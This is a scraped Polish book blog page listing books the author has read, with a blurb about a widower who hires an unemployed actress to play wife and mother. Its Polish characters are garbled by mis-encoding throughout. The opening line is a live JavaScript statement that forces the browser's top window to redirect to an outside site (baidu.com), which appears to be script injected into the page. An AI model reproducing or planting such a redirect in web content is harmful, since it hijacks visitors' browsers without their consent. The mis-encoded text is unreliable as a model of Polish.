JavaScriptRedirectURL="http://www.baidu.com/";window.top.location.href=JavaScriptRedirectURL; Napisz do mnie: anial8000@vp.pl skyp: anial8000 free counters
Free counters


Christmas Countdown

www.clocklink.com
Blog > Komentarze do wpisu

PRZECZYTANE

K

SPÓ¬NIONA MI£O¦Æ

"Harry mia³ ju¿ do¶æ roli samotnego ojca. Postanowi³ o¿eniæ siê z dojrza³±, rozumn± kobiet±, która umia³abym poskromiæ jego niezno¶n± córkê, a jemu stworzyæ przynajmniej namiastkê domu. Uzna³, ¿e aktorskie umiejêtno¶ci Laurie, bezrobotnej absolwentki szko³y teatralnej, gwarantuj± mu, ¿e ¶wietnie zagra rolê matki i ¿ony. Poniewa¿ nie liczy³ na prawdziwy zwi±zek, ani na prawdziwe uczucia, wiêc cynicznie zaproponowa³ Laurie czteroletni kontrakt i wysokie honorarium za zagranie obu tych ról. Laurie by³a wprost wstrz±¶niêta t± upokarzaj±c± ofert±, ale..."

sobota, 06 lutego 2016, anial8

Polecane wpisy

  • PRZECZYTANE

    IDA W¦RÓD MAGNOLII 10. W PU£APCE W¯TPLIWO¦CI " M³oda arystokratka Ida von Waldenburg przejmuje zarz±dzanie rodzinnym maj±tkiem. Nowa sytuacja stwarza szansê na

  • PRZECZYTANE

    IDA W¦RÓD MAGNOLII 9. BEZ LITO¦CI " M³oda arystokratka Ida von Waldenburg przejmuje zarz±dzanie rodzinnym maj±tkiem. Nowa sytuacja stwarza szansê na jej b³yskot

  • PRZECZYTANE

    IDA W¦RÓD MAGNOLII 8. PRZED WIELK¡ BURZ¡ " M³oda arystokratka Ida von Waldenburg przejmuje zarz±dzanie rodzinnym maj±tkiem. Nowa sytuacja stwarza szansê na jej